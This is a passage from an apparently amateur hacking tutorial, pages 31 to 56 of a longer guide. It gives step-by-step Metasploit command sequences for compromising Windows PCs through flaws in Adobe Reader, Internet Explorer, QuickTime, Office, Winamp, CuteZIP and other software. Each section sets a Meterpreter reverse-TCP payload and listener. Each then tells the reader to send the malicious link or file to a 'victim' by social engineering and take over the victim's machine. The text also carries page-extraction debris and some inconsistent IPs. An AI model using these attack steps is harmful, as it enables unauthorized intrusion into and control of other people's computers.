on the local machine)
Msf exploit (adobe_cooltype_sing)>set uripath fr (The Url to use for this exploit)
Msf exploit (adobe_cooltype_sing)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/fr
Send the link of the server to the victim via any social engineering technique.
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 31
IriIriISIrIsT.Ir Page 1
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
Attacting On Remote Windows PC Using Adobe JBIG2Decode Heap
Corruption Exploit:
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0
and earlier. This module relies upon JavaScript for the heap spray.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/adobe_jbig2decode
Msf exploit (adobe_jbig2decode)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_jbig2decode)>set srvhost 192.168.42.131 (This must be an address on the
local machine)
Msf exploit (adobe_jbig2decode)>set uripath beniimage (The Url to use for this exploit)
Msf exploit (adobe_jbig2decode)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/beniimage
Send the link of the server to the victim via any social engineering technique.
W hen the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 32
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Adobe Collab.getIcon() Buffer Overflow:
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.
Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted
pdf that a contains malformed Collab.getIcon () call, an attacker may be able to
execute arbitrary code.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/adobe_geticon
Msf exploit (adobe_geticon)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_geticon)>show options
Msf exploit (adobe_geticon)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (adobe_geticon)>set srvhost 192.168.42.131 (This must be an address on the
local machine)
Msf exploit (adobe_geticon)>set uripath adb (The Url to use for this exploit)
Msf exploit (adobe_geticon)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/adb
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
\\
[Type text] Page 33
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Microsoft Internet Explorer exec
Command Use-After-Free Vulnerability ::
This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE).
When rendering an HTML page, the CMshtmlEd object gets deleted in an
unexpected manner, but the same memory is reused again later in the
CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note
that this vulnerability has been exploited in the wild since Sep 14 2012, and there
is currently no official patch for it.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ie_execcommand_uaf
msf exploit (ie_execcommand_uaf)>set payload windows/meterpreter/reverse_tcp
msf exploit (ie_execcommand_uaf)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (ie_execcommand_uaf)>set srvhost 192.168.42.131 (This must be an address on
the local machine)
msf exploit (ie_execcommand_uaf)>set uripath ie (The Url to use for this exploit)
msf exploit (ie_execcommand_uaf)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 34
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Internet Explorer COM Create Object
Code Execution :
This module exploits generic code execution vulnerability in Internet Explorer by
abusing vulnerable ActiveX objects.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ie_createobject
Msf exploit (ie_createobject)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ie_createobject)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ie_createobject)>set srvhost 192.168.42.131 (This must be an address on the
local machine)
Msf exploit (ie_createobject)>set uripath ie (The Url to use for this exploit)
Msf exploit (ie_createobject)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 35
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Internet Explorer Web View Folder Icon
setSlice() Overflow :
This module exploits a flaw in the WebViewFolderIcon ActiveX control included
with Windows 2000, Windows XP, and Windows 2003. This flaw was published
during the Month of Browser Bugs project
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ms06_057_webview_setslice
Msf exploit (ms06_057_webview_setslice)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_057_webview_setslice)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_057_webview_setslice)>set srvhost 192.168.42.131 (This must be an address on the local machine)
Msf exploit (ms06_057_webview_setslice)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms06_057_webview_setslice)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 36
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Internet Explorer Daxctle.OCX Key Frame
Method Heap Buffer Overflow Vulnerability :
This module exploits heap overflow vulnerability in the Key Frame method of the
direct animation ActiveX control. This is a port of the exploit implemented by
Alexander Sotirov.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ms06_067_keyframe
Msf exploit (ms06_067_keyframe)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_067_keyframe)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_067_keyframe)>set srvhost 192.168.42.131 (This must be an address
on the local machine)
Msf exploit (ms06_067_keyframe) set uripath ie (The Url to use for this exploit)
Msf exploit (ms06_067_keyframe)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 37
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Internet Explorer create Text Range ()
Code Execution :
This module exploits code execution vulnerability in Microsoft Internet Explorer.
Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which,
under certain circumstances, can lead to an invalid/corrupt table pointer
dereference. EIP will point to a very remote, non-existent memory location. This
module is the result of merging three different exploit submissions and has only
been reliably tested against Windows XP SP2. This vulnerability was
independently discovered by multiple parties. The heap spray method used by
this exploit was pioneered by Skylined.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ms06_013_createtextrange
Msf exploit (ms06_013_createtextrange)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms06_013_createtextrange)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms06_013_createtextrange)>set 192.168.42.131 (This must be an address on the
local machine)
Msf exploit (ms06_013_createtextrange)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms06_013_createtextrange)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/ie
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 38
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using MS11_003 Internet Explorer Exploit :
This module exploits a memory corruption vulnerability within Microsoft’s HTML
engine (mshtml). When parsing an HTML page containing a recursive CSS import,
a C++ object is deleted and later reused. This leads to arbitrary code execution.
This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’
module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such,
this module should be reliable on all Windows versions with .NET 2.0.50727
installed.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ms11_003_ie_css_import
Now an URL you should give to your victim http:// 192.168.42.131 : 80/hack.flv
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.42.131(This must be an address on
the local machine)
Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)
Msf exploit (ms11_003_ie_css_import)>set uripath hack.flv (The Url to use for this exploit)
Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)
Msf exploit (ms11_003_ie_css_import)>exploit
[Type text] Page 39
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC in LAN using Internet Explorer DHTML
Behaviors :
This module exploits a use-after-free vulnerability within the DHTML behaviors
functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
discovered being used in-the-wild and was previously known as the “iepeers”
vulnerability. The name comes from Microsoft’s suggested workaround to block
access to the iepeers.dll file. According to Nico Waisman, “The bug itself is when
trying to persist an object using the setAttribute, which end up calling
VariantChangeTypeEx with both the source and the destination being the same
variant. So if you send as a variant an IDISPATCH the algorithm will try to do a
VariantClear of the destination before using it. This will end up on a call to
PlainRelease which deref the reference and clean the object.” NOTE: Internet
Explorer 8 and Internet Explorer 5 are not affected.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ms10_018_ie_behaviors
Msf exploit (ms10_018_ie_behaviors)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_018_ie_behaviors)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_018_ie_behaviors)>set srvhost 192.168.42.31 (This must be an address on
the local machine)
Msf exploit (ms10_018_ie_behaviors)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms10_018_ie_behaviors)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 : 80/ie
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 40
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows XP PC using Internet Explorer Winhlp32.exe
MsgBox Code Execution :
This module exploits a code execution vulnerability that occurs when a user
presses F1 on Message Box originated from VBscript within a web page. When the
user hits F1, the Message Box help functionality will attempt to load and use a
HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.
This particular version of the exploit implements a WebDAV server that will serve
HLP file as well as a payload EXE. During testing warnings about the payload EXE
being unsigned were witnessed. A future version of this module might use other
methods that do not create such a warning.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set srvhost 192.168.42.31 (This must be an address
on the local machine)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set uripath / (The Url to use for this exploit)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>exploit
Now an URL you should give to your victim http:// 192.168.42.131
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 41
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC using Internet Explorer CSS Set User Clip
Memory Corruption Exploit :
This module exploits memory corruption vulnerability within Microsoft’s HTML engine
(mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory
corruption occurs that can lead arbitrary code execution. It seems like Microsoft code
inadvertently increments a vtable pointer to point to an unaligned address within the vtable’s
function pointers. This leads to the program counter being set to the address determined by
the address “*vtable+0x30+1+“. The particular address depends on the exact version of the
mshtml library in use. Since the address depends on the version of mshtml, some versions may
not be exploitable. Specifically, those ending up with a program counter value within another
module, in kernel space, or just not able to be reached with various memory spraying
techniques. Also, since the address is not controllable, it is unlikely to be possible to use ROP to
bypass non-executable memory protections.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ms10_090_ie_css_clip
Msf exploit (ms10_090_ie_css_clip)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_090_ie_css_clip)>set lhost 192.168.42.31 (IP of Local Host)
Msf exploit (ms10_090_ie_css_clip)>set srvhost 192.168.42.31 (This must be an address on the
local machine)
Msf exploit (ms10_090_ie_css_clip)>set uripath clips (The Url to use for this exploit)
Msf exploit (ms10_090_ie_css_clip)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 :8080/clips
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 42
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Internet Explorer 7 CFunction Pointer
Uninitialized Memory Corruption :
This module exploits an error related to the CFunctionPointer function when
attempting to access uninitialized memory. A remote attacker could exploit this
vulnerability to corrupt memory and execute arbitrary code on the system with
the privileges of the victim.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/ms09_002_memory_corruption
Msf exploit (ms09_002_memory_corruption)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms09_002_memory_corruption)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms09_002_memory_corruption)>set srvhost 192.168.42.131 (This must be an address
on the local machine)
Msf exploit (ms09_002_memory_corruption)>set uripath ie (The Url to use for this exploit)
Msf exploit (ms09_002_memory_corruption)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 : 80/ie
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 43
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Apple QuickTime 7.7.2 TeXML Style
Element font-table Field Stack Buffer Overflow :
This module exploits a vulnerability found in Apple QuickTime. When handling a
TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain
arbitrary code execution under the context of the user. This is due to the
QuickTime3GPP.gtx component not handling certain Style subfields properly, as
the font-table field, which is used to trigger the overflow in this module. Because
of QuickTime restrictions when handling font-table fields, only 0×31-0×39 bytes
can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been
provided. The module has been tested successfully on IE6 and IE7 browsers
(Windows XP and Vista).
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/apple_quicktime_texml_font_table
msf exploit (apple_quicktime_texml_font_table)>set payload
windows/meterpreter/reverse_tcp
msf exploit (apple_quicktime_texml_font_table)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (apple_quicktime_texml_font_table)>set srvhost 192.168.42.131 (This must be an
address on the local machine)
msf exploit (apple_quicktime_texml_font_table)>set uripath /(The Url to use for this exploit)
msf exploit (apple_quicktime_texml_font_table)>exploit
Now an URL you should give to your victim http:// 192.168.42.131 : 8080/
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 44
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using gAlan 0.2.1 Buffer Overflow :
This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially
crafted galan file.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/galan_fileformat_bof
msf exploit (galan_fileformat_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (galan_fileformat_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (galan_fileformat_bof)>exploit
After we successfully generate the malicious galan File, it will stored on your local computer
/root/.msf4/local/msf.galan
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Now send your msf.galan files to victim, as soon as they download and open it. Now you can
access meterpreter shell on victim computer.
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 45
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Orbit Downloader URL Unicode
Conversion Overflow :
This module exploits a stack-based buffer overflow in Orbit Downloader. The
vulnerability is due to Orbit converting an URL ascii string to unicode in a insecure
way with Multi ByteTo Wide Char. The vulnerability is exploited with a specially
crafted metalink file that should be opened with Orbit through the “File->Add
Metalink…” option.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/orbit_download_failed_bof
msf exploit (orbit_download_failed_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (orbit_download_failed_bof)>set lhost 192.168.1.4 (IP of Local Host)
msf exploit (orbit_download_failed_bof)>exploit
After we successfully generate the malicious metalink File, it will stored on your local computer
/root/.msf4/local/msf.metalink
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Now send your msf.metalink files to victim, as soon as they download and open it. Now you
can access meterpreter shell on victim computer.
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 46
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Open VPN Trusted Path Privilege
Escalation :
This module exploits a logic flaw due to how the lpApplicationName parameter is
handled. When the lpApplicationName contains a space, the file name is
ambiguous. Take this file path as example: C:program fileshello.exe; The Windows
API will try to interpret this as two possible paths: C:program.exe, and C:program
fileshello.exe, and then execute all of them. To some software developers, this is
an unexpected behavior, which becomes a security problem if an attacker is able
to place a malicious executable in one of these unexpected paths, sometimes
escalate privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1,
OpenSSH Server 5, and others have the same problem. The offensive technique is
also described in Writing Secure Code (2nd Edition), Chapter 23, in the section
“Calling Processes Security” on page 676.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/local/trusted_service_path
msf exploit (trusted_service_path)>set payload windows/meterpreter/reverse_tcp
msf exploit (trusted_service_path)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (trusted_service_path)>set lport 4443 (Port of the local machine)
msf exploit (trusted_service_path)>set session 1
msf exploit (trusted_service_path)>exploit
Now an URL you should give to your victim http:// 192.168.42.131
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 47
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Winamp MAKI Buffer Overflow :
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
where memmove is used within a insecure way with user controlled data. To
exploit the vulnerability the attacker must convince the attacker to install the
generated mcvcore.maki file in the “scripts” directory of the default “Bento” skin,
or generate a new skin using the crafted mcvcore.maki file. The module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/winamp_maki_bof
msf exploit (winamp_maki_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (winamp_maki_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (winamp_maki_bof)>exploit
After we successfully generate the malicious maki File, it will stored on your local computer
/root/.msf4/local/mcvcore.maki
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Now send your mcvcore.maki files to victim, as soon as they download and open it. Now you
can access meterpreter shell on victim computer.
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 48
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Microsoft Office word MS12-027
MSCOMCTL ActiveX Buffer Overflow :
This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a
malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control
as exploited in the wild on April 2012. This module targets Office 2007 and Office
2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP
chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after
office got load, so the malicious file must be loaded through “File / Open” to
achieve exploitation.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/ms12_027_mscomctl_bof
msf exploit (ms12_027_mscomctl_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms12_027_mscomctl_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (ms12_027_mscomctl_bof)>exploit
After we successfully generate the malicious doc File, it will stored on your local computer
/root/.msf4/local/msf.doc
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 49
IriIriISIrIsT.Ir Page 1
Now send your msf.doc files to victim, as soon as they download and open it. Now you can
access meterpreter shell on victim computer.
Attacting On Remote Windows PC Using global SCAPE Cute ZIP Stack Buffer
Overflow :
This module exploits stack-based buffer overflow vulnerability in version 2.1 of
CuteZIP. In order for the command to be executed, an attacker must convince the
target user to open a specially crafted zip file with CuteZIP. By doing so, an
attacker can execute arbitrary code as the target user.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/cutezip_bof
msf exploit (cutezip_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (cutezip_bof)>set lhost 192.168.42.131 (IP of Local Host)
msf exploit (cutezip_bof)>exploit
After we successfully generate the malicious ZIP File, it will stored on your local computer
/root/.msf4/local/msf.zip
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 50
IriIriISIrIsT.Ir Page 1
Now send your msf.zip files to victim, as soon as they download and open it. Now you can
access meterpreter shell
Attacting On Remote Windows PC Using Simple Web Server Connection Header
Buffer Overflow :
This module exploits vulnerability in Simple Web Server 2.2 rc2. A remote user
can send a long string data in the Connection Header to causes an overflow on the
stack when function vsprintf () is used, and gain arbitrary code execution. The
module has been tested successfully on Windows 7 SP1 and Windows XP SP3…
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/http/sws_connection_bof
msf exploit(sws_connection_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(sws_connection_bof) > set lhost 192.168.42.131 [IP of Local Host]
msf exploit(sws_connection_bof) > set rhost 192.168.1.7 [IP of Victim PC]
msf exploit(sws_connection_bof) > exploit
Now an URL you should give to your victim http:// 192.168.42.131
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 51
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows 7 PC Using Microsoft XML Core Services MSXML
Uninitialized Memory Corruption :
This module exploits a memory corruption flaw in Microsoft XML Core Services
when trying to access an uninitialized Node with the get Definition API, which may
corrupt memory allowing remote code execution.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/browser/msxml_get_definition_code_exec
Msf exploit (msxml_get_definition_code_exec)>set payload windows/meterpreter/reverse_tcp
Msf exploit (msxml_get_definition_code_exec)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (msxml_get_definition_code_exec)>set srvhost 192.168.42.131 (This must be an address on
the local machine)
Msf exploit (msxml_get_definition_code_exec)>set uripath / (The Url to use for this exploit)
Msf exploit (msxml_get_definition_code_exec)>exploit
Now an URL you should give to your victim http:// 192.168.42.131:8080/
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 52
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows 7 PC Using Poison Ivy 2.3.2 C&C Server Buffer
Overflow :
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The
exploit does not need to know the password chosen for the bot/server
communication. If the C&C is configured with the default ‘admin’ password, the
exploit should work fine. In case of the C&C configured with another password
the exploit can fail. The ‘check’ command can be used to determine if the C&C
target is using the default ‘admin’ password. Hopefully an exploit try won’t crash
the Poison Ivy C&C process, just the thread responsible of handling the
connection. Because of this the module provides the RANDHEADER option and a
bruteforce target. If RANDHEADER is used a random header will be used. If the
brute force target is selected, a random header will be sent in case the default for
the password ‘admin’ doesn’t work. Bruteforce will stop after 5 tries or a session
obtained.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/misc/poisonivy_bof
Msf exploit (poisonivy_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (poisonivy_bof)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (poisonivy_bof)>set rhost 192.168.12.119 (IP of Victim PC)
Msf exploit (poisonivy_bof)>exploit
Now an URL you should give to your victim http:// 192.168.42.131
Send the link of the server to the victim via any social engineering technique.
When the victim open that link in their browser You get access to the victims PC.
Use “Sessions -l” and the Session number to connect to the session
[Type text] Page 53
IriIriISIrIsT.Ir Page 1
Attacting On Remote Windows PC Using Apple QuickTime TeXML Stack Buffer
Overflow :
This module exploits a vulnerability found in Apple QuickTime. When handling a
TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain
arbitrary code execution under the context of the user. The flaw is generally
known as a bug while processing the ‘transform’ attribute, however, that attack
vector seems to only cause a Terminate Process call due to a corrupt stack cookie,
and more data will only trigger a warning about the malformed XML file. This
module exploits the ‘color’ value instead, which accomplishes the same thing.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/apple_quicktime_texml
Msf exploit (apple_quicktime_texml)>set payload windows/meterpreter/reverse_tcp
Msf exploit (apple_quicktime_texml)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (apple_quicktime_texml)>set srvhost 192.168.1.3 (Victim IP)
Msf exploit (apple_quicktime_texml)>show targets
Msf exploit (apple_quicktime_texml)>set target 0
Msf exploit (apple_quicktime_texml)>exploit
After we successfully generate the malicious File, it will stored on your local computer
/root/.msf4/local/msf.xml
Now we need to set up a listener to handle reverse connection sent by victim when the exploit
successfully executed.
[Type text] Page 54
IriIriISIrIsT.Ir Page 1
Now send your msf.xml files to victim, as soon as they download and open it. Now you can
access meterpreter shell on victim computer.
Attacting On Remote Windows PC Using Microsoft Office Click Once
Unsafe Object Package Handling Vulnerability :
This module exploits a vulnerability found in Microsoft Office’s Click Once feature.
When handling a Macro document, the application fails to recognize certain file
extensions as dangerous executables, which can be used to bypass the warning
message. This allows you to trick your victim into opening the malicious
document, which will load up either a python or ruby payload based on your
choosing, and then finally download and execute our executable.
Open backtrack terminal type msfconsole then type below command:
use exploit/windows/fileformat/ms12_005
Msf exploit (ms12_005)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms12_005)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms12_005)>exploit
Use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
[Type text] Page 55
IriIriISIrIsT.Ir Page 1
After we successfully generate the malicious Document File, it will stored on your local
computer
/root/.msf4/local/msf.docm
Now send your msf.docm files to victim, as soon as they download and open it. Now you can
access meterpreter shell on victim computer.
[Type text] Page 56
IriIriISIrIsT.Ir Page 1
Tnx All Dears For Reading This Article
By Red H4t V!per